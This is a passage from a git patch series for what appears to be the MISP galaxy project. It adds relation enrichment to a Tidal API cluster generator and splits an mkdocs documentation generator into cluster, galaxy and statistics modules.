"__main__": description="Create galaxy and cluster json files from Tidal API" ) parser.add_argument( + "-a", "--all", action="store_true", help="Create all galaxies and clusters", @@ -88,6 +89,11 @@ if __name__ == "__main__": required=True, help="The version of the galaxy", ) + parser.add_argument( + "--extended-relations", + action="store_true", + help="Create extended relations in the cluster", + ) parser.set_defaults(func=main) args = parser.parse_args() diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index fca9171..f85839d 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -1,4 +1,5 @@ from dataclasses import dataclass, field, asdict +from typing import Type import json @@ -19,6 +20,13 @@ class GroupsMeta(Meta): owner: str = None +@dataclass +class AssociatedGroupsMeta(Meta): + id: str = None + owner_id: str = None + owner: str = None + + @dataclass class SoftwareMeta(Meta): source: str = None @@ -29,6 +37,13 @@ class SoftwareMeta(Meta): owner: str = None +@dataclass +class AssociatedSoftwareMeta(Meta): + id: str = None + owner_id: str = None + owner: str = None + + @dataclass class TechniqueMeta(Meta): source: str = None @@ -108,9 +123,10 @@ class Cluster: self.type = type self.uuid = uuid self.values = [] + self.CLUSTER_PATH = "../../clusters" - def add_values(self): - print("This method should be implemented in the child class") + def add_values(self, data: dict, meta_class: Type[Meta]): + pass def save_to_file(self, path): with open(path, "w") as file: @@ -131,6 +147,24 @@ class Cluster: "values": self.values, } + def _get_relation_from_mitre_id( + self, mitre_id: str, cluster: str, meta_key: str, array: bool = False + ): + with open(f"{self.CLUSTER_PATH}/{cluster}.json", "r") as file: + mitre = json.load(file) + for entry in mitre["values"]: + try: + if array: + for id in entry["meta"][meta_key]: + if id == mitre_id: + return entry["uuid"] + else: + if entry["meta"][meta_key] == mitre_id: + return entry["uuid"] + except KeyError: + continue + return None + class GroupCluster(Cluster): def __init__( @@ -142,8 +176,10 @@ class GroupCluster(Cluster): source: str, type: str, uuid: str, + enrichment: bool = False, ): super().__init__(authors, category, description, name, source, type, uuid) + self.enrichment = enrichment def add_values(self, data): for entry in data["data"]: @@ -166,13 +202,39 @@ class GroupCluster(Cluster): owner=entry.get("owner_name"), ) related = [] - for relation in entry.get("associated_groups"): + if self.enrichment: + related_cluster = self._get_relation_from_mitre_id( + entry.get("group_attack_id"), "threat-actor", "synonyms", True + ) + if related_cluster: + related.append( + { + "dest-uuid": related_cluster, + "type": "similar", + } + ) + + for associated_group in entry.get("associated_groups"): + meta = AssociatedGroupsMeta( + id=associated_group.get("id"), + owner_id=associated_group.get("owner_id"), + owner=associated_group.get("owner_name"), + ) + value = ClusterValue( + description=associated_group.get("description"), + meta=meta, + related=[], + uuid=associated_group.get("associated_group_id"), + value=associated_group.get("name"), + ) + self.values.append(value.return_value()) related.append( { - "dest-uuid": relation.get("id"), - "type": "related-to", + "dest-uuid": associated_group.get("associated_group_id"), + "type": "similar", } ) + value = ClusterValue( description=entry.get("description"), meta=meta, @@ -193,8 +255,10 @@ class SoftwareCluster(Cluster): source: str, type: str, uuid: str, + enrichment: bool = False, ): super().__init__(authors, category, description, name, source, type, uuid) + self.enrichment = enrichment def add_values(self, data): for entry in data["data"]: @@ -214,13 +278,50 @@ class SoftwareCluster(Cluster): "type": "used-by", } ) - for relation in entry.get("associated_software"): + if self.enrichment: + related_cluster = self._get_relation_from_mitre_id( + entry.get("software_attack_id"), "mitre-tool", "external_id" + ) + if related_cluster: + related.append( + { + "dest-uuid": related_cluster, + "type": "similar", + } + ) + + related_cluster = self._get_relation_from_mitre_id( + entry.get("software_attack_id"), "mitre-malware", "external_id" + ) + if related_cluster: + related.append( + { + "dest-uuid": related_cluster, + "type": "similar", + } + ) + + for associated_software in entry.get("associated_software"): + meta = AssociatedSoftwareMeta( + id=associated_software.get("id"), + owner_id=associated_software.get("owner_id"), + owner=associated_software.get("owner_name"), + ) + value = ClusterValue( + description=associated_software.get("description"), + meta=meta, + related=[], + uuid=associated_software.get("associated_software_id"), + value=associated_software.get("name"), + ) + self.values.append(value.return_value()) related.append( { - "dest-uuid": relation.get("id"), - "type": "related-to", + "dest-uuid": associated_software.get("associated_software_id"), + "type": "similar", } ) + value = ClusterValue( description=entry.get("description"), meta=meta, @@ -260,6 +361,35 @@ class TechniqueCluster(Cluster): "type": "uses", } ) + + for sub_technique in entry.get("sub_technique"): + meta = SubTechniqueMeta( + source=sub_technique.get("source"), + technique_attack_id=sub_technique.get("technique_attack_id"), + ) + sub_related = [] + for relation in sub_technique.get("tactic"): + sub_related.append( + { + "dest-uuid": relation.get("tactic_id"), + "type": "uses", + } + ) + sub_value = ClusterValue( + description=sub_technique.get("description"), + meta=meta, + related=sub_related, + uuid=sub_technique.get("id"), + value=sub_technique.get("name"), + ) + self.values.append(sub_value.return_value()) + related.append( + { + "dest-uuid": sub_technique.get("id"), + "type": "similar", + } + ) + value = ClusterValue( description=entry.get("description"), meta=meta, @@ -269,28 +399,6 @@ class TechniqueCluster(Cluster): ) self.values.append(value.return_value()) - for sub_technique in entry.get("sub_technique"): - meta = SubTechniqueMeta( - source=sub_technique.get("source"), - technique_attack_id=sub_technique.get("technique_attack_id"), - ) - related = [] - for relation in sub_technique.get("tactic"): - related.append( - { - "dest-uuid": relation.get("tactic_id"), - "type": "uses", - } - ) - value = ClusterValue( - description=sub_technique.get("description"), - meta=meta, - related=related, - uuid=sub_technique.get("id"), - value=sub_technique.get("name"), - ) - self.values.append(value.return_value()) - class TacticCluster(Cluster): def __init__( From a0f3ed587343e2023173bfe36d55b917575d3153 Mon Sep 17 00:00:00 2001 From: niclas Date: Mon, 26 Feb 2024 09:40:42 +0100 Subject: [PATCH 10/49] Add [tidal] relations for associated objects --- tools/tidal-api/models/cluster.py | 30 ++++++++++++++++++++++-------- 1 file changed, 22 insertions(+), 8 deletions(-) diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index f85839d..8b355ea 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -215,15 +215,22 @@ class GroupCluster(Cluster): ) for associated_group in entry.get("associated_groups"): - meta = AssociatedGroupsMeta( + associated_meta = AssociatedGroupsMeta( id=associated_group.get("id"), owner_id=associated_group.get("owner_id"), owner=associated_group.get("owner_name"), ) + associated_related = [] + associated_related.append( + { + "dest-uuid": entry.get("id"), + "type": "similar", + } + ) value = ClusterValue( description=associated_group.get("description"), - meta=meta, - related=[], + meta=associated_meta, + related=associated_related, uuid=associated_group.get("associated_group_id"), value=associated_group.get("name"), ) @@ -302,15 +309,22 @@ class SoftwareCluster(Cluster): ) for associated_software in entry.get("associated_software"): - meta = AssociatedSoftwareMeta( + associated_meta = AssociatedSoftwareMeta( id=associated_software.get("id"), owner_id=associated_software.get("owner_id"), owner=associated_software.get("owner_name"), ) + associated_related = [] + associated_related.append( + { + "dest-uuid": entry.get("id"), + "type": "similar", + } + ) value = ClusterValue( description=associated_software.get("description"), - meta=meta, - related=[], + meta=associated_meta, + related=associated_related, uuid=associated_software.get("associated_software_id"), value=associated_software.get("name"), ) @@ -363,7 +377,7 @@ class TechniqueCluster(Cluster): ) for sub_technique in entry.get("sub_technique"): - meta = SubTechniqueMeta( + sub_meta = SubTechniqueMeta( source=sub_technique.get("source"), technique_attack_id=sub_technique.get("technique_attack_id"), ) @@ -377,7 +391,7 @@ class TechniqueCluster(Cluster): ) sub_value = ClusterValue( description=sub_technique.get("description"), - meta=meta, + meta=sub_meta, related=sub_related, uuid=sub_technique.get("id"), value=sub_technique.get("name"), From b85fd1538ee0a26447ea0bb44d603adef63192b0 Mon Sep 17 00:00:00 2001 From: niclas Date: Mon, 26 Feb 2024 15:33:26 +0100 Subject: [PATCH 11/49] Refactor [generator] --- tools/mkdocs/generator.py | 479 ++--------------------------- tools/mkdocs/modules/__init__.py | 0 tools/mkdocs/modules/cluster.py | 255 +++++++++++++++ tools/mkdocs/modules/galaxy.py | 74 +++++ tools/mkdocs/modules/statistics.py | 118 +++++++ tools/mkdocs/utils/__init__.py | 0 tools/mkdocs/utils/helper.py | 21 ++ 7 files changed, 489 insertions(+), 458 deletions(-) create mode 100644 tools/mkdocs/modules/__init__.py create mode 100644 tools/mkdocs/modules/cluster.py create mode 100644 tools/mkdocs/modules/galaxy.py create mode 100644 tools/mkdocs/modules/statistics.py create mode 100644 tools/mkdocs/utils/__init__.py create mode 100644 tools/mkdocs/utils/helper.py diff --git a/tools/mkdocs/generator.py b/tools/mkdocs/generator.py index 0a8c528..6f87abf 100644 --- a/tools/mkdocs/generator.py +++ b/tools/mkdocs/generator.py @@ -1,12 +1,11 @@ #!/usr/bin/python +from modules.galaxy import Galaxy +from modules.statistics import Statistics + import json -import operator import os import time -from typing import List - -import validators CLUSTER_PATH = "../../clusters" SITE_PATH = "./site/docs" @@ -15,14 +14,6 @@ GALAXY_PATH = "../../galaxies" FILES_TO_IGNORE = [] # if you want to skip a specific cluster in the generation -# Variables for statistics -public_relations_count = 0 -private_relations_count = 0 -private_clusters = [] -public_clusters_dict = {} -relation_count_dict = {} -synonyms_count_dict = {} -empty_uuids_dict = {} INTRO = """ # MISP Galaxy @@ -60,449 +51,19 @@ We encourage collaboration and contributions to the [MISP Galaxy JSON files](htt """ - -class Galaxy: - def __init__( - self, cluster_list: List[dict], authors, description, name, json_file_name - ): - - self.cluster_list = cluster_list - self.authors = authors - self.description = description - self.name = name - self.json_file_name = json_file_name - self.clusters = self._create_clusters() - self.entry = "" - - def _create_metadata_entry(self): - self.entry += "---\n" - self.entry += f"title: {self.name}\n" - meta_description = self.description.replace('"', "-") - self.entry += f"description: {meta_description}\n" - self.entry += "---\n" - - def _create_title_entry(self): - self.entry += f"# {self.name}\n" - - def _create_description_entry(self): - self.entry += f"{self.description}\n" - - def _create_authors_entry(self): - if self.authors: - self.entry += f"\n" - self.entry += f'??? info "Authors"\n' - self.entry += f"\n" - self.entry += f" | Authors and/or Contributors|\n" - self.entry += f" |----------------------------|\n" - for author in self.authors: - self.entry += f" |{author}|\n" - - def _create_clusters(self): - clusters = [] - for cluster in self.cluster_list: - clusters.append( - Cluster( - value=cluster.get("value", None), - description=cluster.get("description", None), - uuid=cluster.get("uuid", None), - date=cluster.get("date", None), - related_list=cluster.get("related", None), - meta=cluster.get("meta", None), - galaxie=self, - ) - ) - return clusters - - def _create_clusters_entry(self, cluster_dict): - for cluster in self.clusters: - self.entry += cluster.create_entry(cluster_dict) - - def create_entry(self, cluster_dict): - self._create_metadata_entry() - self._create_title_entry() - self._create_description_entry() - self._create_authors_entry() - self._create_clusters_entry(cluster_dict) - return self.entry - - def write_entry(self, path, cluster_dict): - self.create_entry(cluster_dict) - galaxy_path = os.path.join(path, self.json_file_name) - if not os.path.exists(galaxy_path): - os.mkdir(galaxy_path) - with open(os.path.join(galaxy_path, "index.md"), "w") as index: - index.write(self.entry) - - -class Cluster: - def __init__(self, description, uuid, date, value, related_list, meta, galaxie): - self.description = description - self.uuid = uuid - self.date = date - self.value = value - self.related_list = related_list - self.meta = meta - self.entry = "" - self.galaxie = galaxie - - global public_clusters_dict - if self.galaxie: - public_clusters_dict[self.uuid] = self.galaxie - - def _create_title_entry(self): - self.entry += f"## {self.value}\n" - self.entry += f"\n" - - def _create_description_entry(self): - if self.description: - self.entry += f"{self.description}\n" - - def _create_synonyms_entry(self): - if isinstance(self.meta, dict) and self.meta.get("synonyms"): - self.entry += f"\n" - self.entry += f'??? info "Synonyms"\n' - self.entry += f"\n" - self.entry += f' "synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular {self.value}.\n\n' - self.entry += f" | Known Synonyms |\n" - self.entry += f" |---------------------|\n" - global synonyms_count_dict - synonyms_count = 0 - for synonym in sorted(self.meta["synonyms"]): - synonyms_count += 1 - self.entry += f" | `{synonym}` |\n" - synonyms_count_dict[self.uuid] = synonyms_count - - def _create_uuid_entry(self): - if self.uuid: - self.entry += f"\n" - self.entry += f'??? tip "Internal MISP references"\n' - self.entry += f"\n" - self.entry += f" UUID `{self.uuid}` which can be used as unique global reference for `{self.value}` in MISP communities and other software using the MISP galaxy\n" - self.entry += f"\n" - - def _create_refs_entry(self): - if isinstance(self.meta, dict) and self.meta.get("refs"): - self.entry += f"\n" - self.entry += f'??? info "External references"\n' - self.entry += f"\n" - - for ref in self.meta["refs"]: - if validators.url(ref): - self.entry += f" - [{ref}]({ref}) - :material-archive: :material-arrow-right: [webarchive](https://web.archive.org/web/*/{ref})\n" - else: - self.entry += f" - {ref}\n" - - self.entry += f"\n" - - def _create_associated_metadata_entry(self): - if isinstance(self.meta, dict): - excluded_meta = ["synonyms", "refs"] - self.entry += f"\n" - self.entry += f'??? info "Associated metadata"\n' - self.entry += f"\n" - self.entry += f" |Metadata key {{ .no-filter }} |Value|\n" - self.entry += f" |-----------------------------------|-----|\n" - for meta in sorted(self.meta.keys()): - if meta not in excluded_meta: - self.entry += f" | {meta} | {self.meta[meta]} |\n" - - def get_related_clusters( - self, cluster_dict, depth=-1, visited=None, level=1, related_private_clusters={} - ): - global public_relations_count - global private_relations_count - global private_clusters - global empty_uuids_dict - empty_uuids = 0 - - if visited is None: - visited = {} - - related_clusters = [] - if depth == 0 or not self.related_list: - return related_clusters - - if self.uuid in visited and visited[self.uuid] <= level: - return related_clusters - else: - visited[self.uuid] = level - - for cluster in self.related_list: - dest_uuid = cluster["dest-uuid"] - - # Cluster is private - if dest_uuid not in cluster_dict: - # Check if UUID is empty - if not dest_uuid: - empty_uuids += 1 - continue - private_relations_count += 1 - if dest_uuid not in private_clusters: - private_clusters.append(dest_uuid) - if dest_uuid in related_private_clusters: - related_clusters.append( - ( - self, - related_private_clusters[dest_uuid], - level, - ) - ) - else: - related_clusters.append( - ( - self, - Cluster( - value="Private Cluster", - uuid=dest_uuid, - date=None, - description=None, - related_list=None, - meta=None, - galaxie=None, - ), - level, - ) - ) - related_private_clusters[dest_uuid] = related_clusters[-1][1] - continue - - related_cluster = cluster_dict[dest_uuid] - - public_relations_count += 1 - - related_clusters.append((self, related_cluster, level)) - - if (depth > 1 or depth == -1) and ( - cluster["dest-uuid"] not in visited - or visited[cluster["dest-uuid"]] > level + 1 - ): - new_depth = depth - 1 if depth > 1 else -1 - if cluster["dest-uuid"] in cluster_dict: - related_clusters += cluster_dict[ - cluster["dest-uuid"] - ].get_related_clusters( - cluster_dict, - new_depth, - visited, - level + 1, - related_private_clusters, - ) - - if empty_uuids > 0: - empty_uuids_dict[self.value] = empty_uuids - - # Remove duplicates - to_remove = set() - cluster_dict = {} - for cluster in related_clusters: - key1 = (cluster[0], cluster[1]) - key2 = (cluster[1], cluster[0]) - - if key1 in cluster_dict: - if cluster_dict[key1][2] > cluster[2]: - to_remove.add(cluster_dict[key1]) - cluster_dict[key1] = cluster - else: - to_remove.add(cluster) - - elif key2 in cluster_dict: - if cluster_dict[key2][2] > cluster[2]: - to_remove.add(cluster_dict[key2]) - cluster_dict[key2] = cluster - else: - to_remove.add(cluster) - - else: - cluster_dict[key1] = cluster - related_clusters = [ - cluster for cluster in related_clusters if cluster not in to_remove - ] - - return related_clusters - - def _create_related_entry(self): - self.entry += f"\n" - self.entry += f'??? info "Related clusters"\n' - self.entry += f"\n" - self.entry += f" To see the related clusters, click [here](./relations/{self.uuid}.md).\n" - - def _get_related_entry(self, relations): - output = "" - output += f"## Related clusters for {self.value}\n" - output += f"\n" - output += f"| Cluster A | Cluster B | Level {{ .graph }} |\n" - output += f"|-----------|-----------|-------|\n" - for relation in relations: - placeholder = "__TMP__" - - cluster_a_section = ( - relation[0] - .value.lower() - .replace(" - ", placeholder) # Replace " - " first - .replace(" ", "-") - .replace("/", "") - .replace(":", "") - .replace(placeholder, "-") - ) # Replace the placeholder with "-" - - cluster_b_section = ( - relation[1] - .value.lower() - .replace(" - ", placeholder) # Replace " - " first - .replace(" ", "-") - .replace("/", "") - .replace(":", "") - .replace(placeholder, "-") - ) # Replace the placeholder with "-" - - if cluster_b_section != "private-cluster": - output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxie.json_file_name}/index.md#{cluster_a_section}) | [{relation[1].value} ({relation[1].uuid})](../../{relation[1].galaxie.json_file_name}/index.md#{cluster_b_section}) | {relation[2]} |\n" - else: - output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxie.json_file_name}/index.md#{cluster_a_section}) | {relation[1].value} ({relation[1].uuid}) | {relation[2]} |\n" - return output - - def create_entry(self, cluster_dict): - self._create_title_entry() - self._create_description_entry() - self._create_synonyms_entry() - self._create_uuid_entry() - self._create_refs_entry() - self._create_associated_metadata_entry() - if self.related_list: - self._create_related_entry() - self._write_relations(cluster_dict, SITE_PATH) - return self.entry - - def _write_relations(self, cluster_dict, path): - related_clusters = self.get_related_clusters(cluster_dict) - global relation_count_dict - relation_count_dict[self.uuid] = len(related_clusters) - galaxy_path = os.path.join(path, self.galaxie.json_file_name) - if not os.path.exists(galaxy_path): - os.mkdir(galaxy_path) - relation_path = os.path.join(galaxy_path, "relations") - if not os.path.exists(relation_path): - os.mkdir(relation_path) - with open(os.path.join(relation_path, ".pages"), "w") as index: - index.write(f"hide: true\n") - with open(os.path.join(relation_path, f"{self.uuid}.md"), "w") as index: - index.write(self._get_related_entry(related_clusters)) - +def write_galaxy_entry(galaxy, site_path, cluster_dict): + galaxy.write_entry(site_path, cluster_dict) + return f"Finished writing entry for {galaxy.name}" def create_index(galaxies): index_output = INTRO - for galaxie in galaxies: - index_output += f"- [{galaxie.name}](./{galaxie.json_file_name}/index.md)\n" + for galaxy in galaxies: + index_output += f"- [{galaxy.name}](./{galaxy.json_file_name}/index.md)\n" index_output += STATISTICS index_output += CONTRIBUTING return index_output -def get_top_x(dict, x, big_to_small=True): - sorted_dict = sorted( - dict.items(), key=operator.itemgetter(1), reverse=big_to_small - )[:x] - top_x = [key for key, value in sorted_dict] - top_x_values = sorted(dict.values(), reverse=big_to_small)[:x] - return top_x, top_x_values - - -def name_to_section(name): - placeholder = "__TMP__" - return ( - name.lower() - .replace(" - ", placeholder) # Replace " - " first - .replace(" ", "-") - .replace("/", "") - .replace(":", "") - .replace(placeholder, "-") - ) # Replace the placeholder with "-" - - -def create_statistics(cluster_dict): - statistic_output = "" - statistic_output += f"# MISP Galaxy statistics\n" - statistic_output += "The MISP galaxy statistics are automatically generated based on the MISP galaxy JSON files. Therefore the statistics only include detailed infomration about public clusters and relations. Some statistics about private clusters and relations is included but only as an approximation based on the information gathered from the public clusters.\n" - - statistic_output += f"# Cluster statistics\n" - statistic_output += f"## Number of clusters\n" - statistic_output += f"Here you can find the total number of clusters including public and private clusters. The number of public clusters has been calculated based on the number of unique Clusters in the MISP galaxy JSON files. The number of private clusters could only be approximated based on the number of relations to non-existing clusters. Therefore the number of private clusters is not accurate and only an approximation.\n" - statistic_output += f"\n" - statistic_output += f"| No. | Type | Count {{ .pie-chart }}|\n" - statistic_output += f"|----|------|-------|\n" - statistic_output += f"| 1 | Public clusters | {len(public_clusters_dict)} |\n" - statistic_output += f"| 2 | Private clusters | {len(private_clusters)} |\n" - statistic_output += f"\n" - - statistic_output += f"## Galaxies with the most clusters\n" - galaxy_counts = {} - for galaxy in public_clusters_dict.values(): - galaxy_counts[galaxy] = galaxy_counts.get(galaxy, 0) + 1 - top_galaxies, top_galaxies_values = get_top_x(galaxy_counts, 20) - statistic_output += f" | No. | Galaxy | Count {{ .log-bar-chart }}|\n" - statistic_output += f" |----|--------|-------|\n" - for i, galaxy in enumerate(top_galaxies, 1): - galaxy_section = name_to_section(galaxy.json_file_name) - statistic_output += f" | {i} | [{galaxy.name}](../{galaxy_section}) | {top_galaxies_values[i-1]} |\n" - statistic_output += f"\n" - - statistic_output += f"## Galaxies with the least clusters\n" - flop_galaxies, flop_galaxies_values = get_top_x(galaxy_counts, 20, False) - statistic_output += f" | No. | Galaxy | Count {{ .bar-chart }}|\n" - statistic_output += f" |----|--------|-------|\n" - for i, galaxy in enumerate(flop_galaxies, 1): - galaxy_section = name_to_section(galaxy.json_file_name) - statistic_output += f" | {i} | [{galaxy.name}](../{galaxy_section}) | {flop_galaxies_values[i-1]} |\n" - statistic_output += f"\n" - - statistic_output += f"# Relation statistics\n" - statistic_output += f"Here you can find the total number of relations including public and private relations. The number includes relations between public clusters and relations between public and private clusters. Therefore relatons between private clusters are not included in the statistics.\n" - statistic_output += f"\n" - statistic_output += f"## Number of relations\n" - statistic_output += f"| No. | Type | Count {{ .pie-chart }}|\n" - statistic_output += f"|----|------|-------|\n" - statistic_output += f"| 1 | Public relations | {public_relations_count} |\n" - statistic_output += f"| 2 | Private relations | {private_relations_count} |\n" - statistic_output += f"\n" - - statistic_output += f"**Average number of relations per cluster**: {int(sum(relation_count_dict.values()) / len(relation_count_dict))}\n" - - statistic_output += f"## Cluster with the most relations\n" - relation_count_dict_names = { - cluster_dict[uuid].value: count for uuid, count in relation_count_dict.items() - } - top_25_relation, top_25_relation_values = get_top_x(relation_count_dict_names, 20) - statistic_output += f" | No. | Cluster | Count {{ .bar-chart }}|\n" - statistic_output += f" |----|--------|-------|\n" - relation_count_dict_galaxies = { - cluster_dict[uuid].value: cluster_dict[uuid].galaxie.json_file_name - for uuid in relation_count_dict.keys() - } - for i, cluster in enumerate(top_25_relation, 1): - cluster_section = name_to_section(cluster) - statistic_output += f" | {i} | [{cluster}](../{relation_count_dict_galaxies[cluster]}/#{cluster_section}) | {top_25_relation_values[i-1]} |\n" - statistic_output += f"\n" - - statistic_output += f"# Synonyms statistics\n" - statistic_output += f"## Cluster with the most synonyms\n" - synonyms_count_dict_names = { - cluster_dict[uuid].value: count for uuid, count in synonyms_count_dict.items() - } - top_synonyms, top_synonyms_values = get_top_x(synonyms_count_dict_names, 20) - statistic_output += f" | No. | Cluster | Count {{ .bar-chart }}|\n" - statistic_output += f" |----|--------|-------|\n" - synonyms_count_dict_galaxies = { - cluster_dict[uuid].value: cluster_dict[uuid].galaxie.json_file_name - for uuid in synonyms_count_dict.keys() - } - for i, cluster in enumerate(top_synonyms, 1): - cluster_section = name_to_section(cluster) - statistic_output += f" | {i} | [{cluster}](../{synonyms_count_dict_galaxies[cluster]}/#{cluster_section}) | {top_synonyms_values[i-1]} |\n" - statistic_output += f"\n" - - return statistic_output - - def get_deprecated_galaxy_files(): deprecated_galaxy_files = [] for f in os.listdir(GALAXY_PATH): @@ -527,22 +88,26 @@ def main(): galaxies = [] for galaxy in galaxies_fnames: with open(os.path.join(CLUSTER_PATH, galaxy)) as fr: - galaxie_json = json.load(fr) + galaxy_json = json.load(fr) galaxies.append( Galaxy( - galaxie_json["values"], - galaxie_json["authors"], - galaxie_json["description"], - galaxie_json["name"], - galaxy.split(".")[0], + cluster_list=galaxy_json["values"], + authors=galaxy_json["authors"], + description=galaxy_json["description"], + name=galaxy_json["name"], + json_file_name=galaxy.split(".")[0], ) ) - cluster_dict = {} for galaxy in galaxies: for cluster in galaxy.clusters: cluster_dict[cluster.uuid] = cluster + statistics = Statistics(cluster_dict=cluster_dict) + for galaxy in galaxies: + for cluster in galaxy.clusters: + statistics.add_cluster(cluster) + # Write files if not os.path.exists(SITE_PATH): os.mkdir(SITE_PATH) @@ -551,14 +116,12 @@ def main(): galaxy.write_entry(SITE_PATH, cluster_dict) index_output = create_index(galaxies) - statistic_output = create_statistics(cluster_dict=cluster_dict) + + statistics.write_entry(SITE_PATH) with open(os.path.join(SITE_PATH, "index.md"), "w") as index: index.write(index_output) - with open(os.path.join(SITE_PATH, "statistics.md"), "w") as index: - index.write(statistic_output) - print(f"Finished file creation in {time.time() - start_time} seconds") diff --git a/tools/mkdocs/modules/__init__.py b/tools/mkdocs/modules/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/tools/mkdocs/modules/cluster.py b/tools/mkdocs/modules/cluster.py new file mode 100644 index 0000000..06a5f24 --- /dev/null +++ b/tools/mkdocs/modules/cluster.py @@ -0,0 +1,255 @@ +import os +import validators + + +class Cluster: + def __init__( + self, description, uuid, date, value, related_list, meta, galaxy + ): + self.description = description + self.uuid = uuid + self.date = date + self.value = value + self.related_list = related_list + self.meta = meta + self.entry = "" + self.galaxy = galaxy + self.statistics = None + + def set_statistics(self, statistics): + self.statistics = statistics + + def _create_title_entry(self): + self.entry += f"## {self.value}\n" + self.entry += f"\n" + + def _create_description_entry(self): + if self.description: + self.entry += f"{self.description}\n" + + def _create_synonyms_entry(self): + if isinstance(self.meta, dict) and self.meta.get("synonyms"): + self.entry += f"\n" + self.entry += f'??? info "Synonyms"\n' + self.entry += f"\n" + self.entry += f' "synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular {self.value}.\n\n' + self.entry += f" | Known Synonyms |\n" + self.entry += f" |---------------------|\n" + synonyms_count = 0 + for synonym in sorted(self.meta["synonyms"]): + synonyms_count += 1 + self.entry += f" | `{synonym}` |\n" + self.statistics.synonyms_count_dict[self.uuid] = synonyms_count + + def _create_uuid_entry(self): + if self.uuid: + self.entry += f"\n" + self.entry += f'??? tip "Internal MISP references"\n' + self.entry += f"\n" + self.entry += f" UUID `{self.uuid}` which can be used as unique global reference for `{self.value}` in MISP communities and other software using the MISP galaxy\n" + self.entry += f"\n" + + def _create_refs_entry(self): + if isinstance(self.meta, dict) and self.meta.get("refs"): + self.entry += f"\n" + self.entry += f'??? info "External references"\n' + self.entry += f"\n" + + for ref in self.meta["refs"]: + if validators.url(ref): + self.entry += f" - [{ref}]({ref}) - :material-archive: :material-arrow-right: [webarchive](https://web.archive.org/web/*/{ref})\n" + else: + self.entry += f" - {ref}\n" + + self.entry += f"\n" + + def _create_associated_metadata_entry(self): + if isinstance(self.meta, dict): + excluded_meta = ["synonyms", "refs"] + self.entry += f"\n" + self.entry += f'??? info "Associated metadata"\n' + self.entry += f"\n" + self.entry += f" |Metadata key {{ .no-filter }} |Value|\n" + self.entry += f" |-----------------------------------|-----|\n" + for meta in sorted(self.meta.keys()): + if meta not in excluded_meta: + self.entry += f" | {meta} | {self.meta[meta]} |\n" + + def get_related_clusters( + self, cluster_dict, depth=-1, visited=None, level=1, related_private_clusters={} + ): + empty_uuids = 0 + + if visited is None: + visited = {} + + related_clusters = [] + if depth == 0 or not self.related_list: + return related_clusters + + if self.uuid in visited and visited[self.uuid] <= level: + return related_clusters + else: + visited[self.uuid] = level + + for cluster in self.related_list: + dest_uuid = cluster["dest-uuid"] + + # Cluster is private + if dest_uuid not in cluster_dict: + # Check if UUID is empty + if not dest_uuid: + empty_uuids += 1 + continue + self.statistics.private_relations_count += 1 + if dest_uuid not in self.statistics.private_clusters: + self.statistics.private_clusters.append(dest_uuid) + if dest_uuid in related_private_clusters: + related_clusters.append( + ( + self, + related_private_clusters[dest_uuid], + level, + ) + ) + else: + related_clusters.append( + ( + self, + Cluster( + value="Private Cluster", + uuid=dest_uuid, + date=None, + description=None, + related_list=None, + meta=None, + galaxy=None, + ), + level, + ) + ) + related_private_clusters[dest_uuid] = related_clusters[-1][1] + continue + + related_cluster = cluster_dict[dest_uuid] + + self.statistics.public_relations_count += 1 + + related_clusters.append((self, related_cluster, level)) + + if (depth > 1 or depth == -1) and ( + cluster["dest-uuid"] not in visited + or visited[cluster["dest-uuid"]] > level + 1 + ): + new_depth = depth - 1 if depth > 1 else -1 + if cluster["dest-uuid"] in cluster_dict: + related_clusters += cluster_dict[ + cluster["dest-uuid"] + ].get_related_clusters( + cluster_dict, + new_depth, + visited, + level + 1, + related_private_clusters, + ) + + if empty_uuids > 0: + self.statistics.empty_uuids_dict[self.value] = empty_uuids + + # Remove duplicates + to_remove = set() + cluster_dict = {} + for cluster in related_clusters: + key1 = (cluster[0], cluster[1]) + key2 = (cluster[1], cluster[0]) + + if key1 in cluster_dict: + if cluster_dict[key1][2] > cluster[2]: + to_remove.add(cluster_dict[key1]) + cluster_dict[key1] = cluster + else: + to_remove.add(cluster) + + elif key2 in cluster_dict: + if cluster_dict[key2][2] > cluster[2]: + to_remove.add(cluster_dict[key2]) + cluster_dict[key2] = cluster + else: + to_remove.add(cluster) + + else: + cluster_dict[key1] = cluster + related_clusters = [ + cluster for cluster in related_clusters if cluster not in to_remove + ] + + return related_clusters + + def _create_related_entry(self): + self.entry += f"\n" + self.entry += f'??? info "Related clusters"\n' + self.entry += f"\n" + self.entry += f" To see the related clusters, click [here](./relations/{self.uuid}.md).\n" + + def _get_related_entry(self, relations): + output = "" + output += f"## Related clusters for {self.value}\n" + output += f"\n" + output += f"| Cluster A | Cluster B | Level {{ .graph }} |\n" + output += f"|-----------|-----------|-------|\n" + for relation in relations: + placeholder = "__TMP__" + + cluster_a_section = ( + relation[0] + .value.lower() + .replace(" - ", placeholder) # Replace " - " first + .replace(" ", "-") + .replace("/", "") + .replace(":", "") + .replace(placeholder, "-") + ) # Replace the placeholder with "-" + + cluster_b_section = ( + relation[1] + .value.lower() + .replace(" - ", placeholder) # Replace " - " first + .replace(" ", "-") + .replace("/", "") + .replace(":", "") + .replace(placeholder, "-") + ) # Replace the placeholder with "-" + + if cluster_b_section != "private-cluster": + output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxy.json_file_name}/index.md#{cluster_a_section}) | [{relation[1].value} ({relation[1].uuid})](../../{relation[1].galaxy.json_file_name}/index.md#{cluster_b_section}) | {relation[2]} |\n" + else: + output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxy.json_file_name}/index.md#{cluster_a_section}) | {relation[1].value} ({relation[1].uuid}) | {relation[2]} |\n" + return output + + def create_entry(self, cluster_dict, path): + if not self.statistics: + raise ValueError("Statistics not set") + self._create_title_entry() + self._create_description_entry() + self._create_synonyms_entry() + self._create_uuid_entry() + self._create_refs_entry() + self._create_associated_metadata_entry() + if self.related_list: + self._create_related_entry() + self._write_relations(cluster_dict, path) + return self.entry + + def _write_relations(self, cluster_dict, path): + 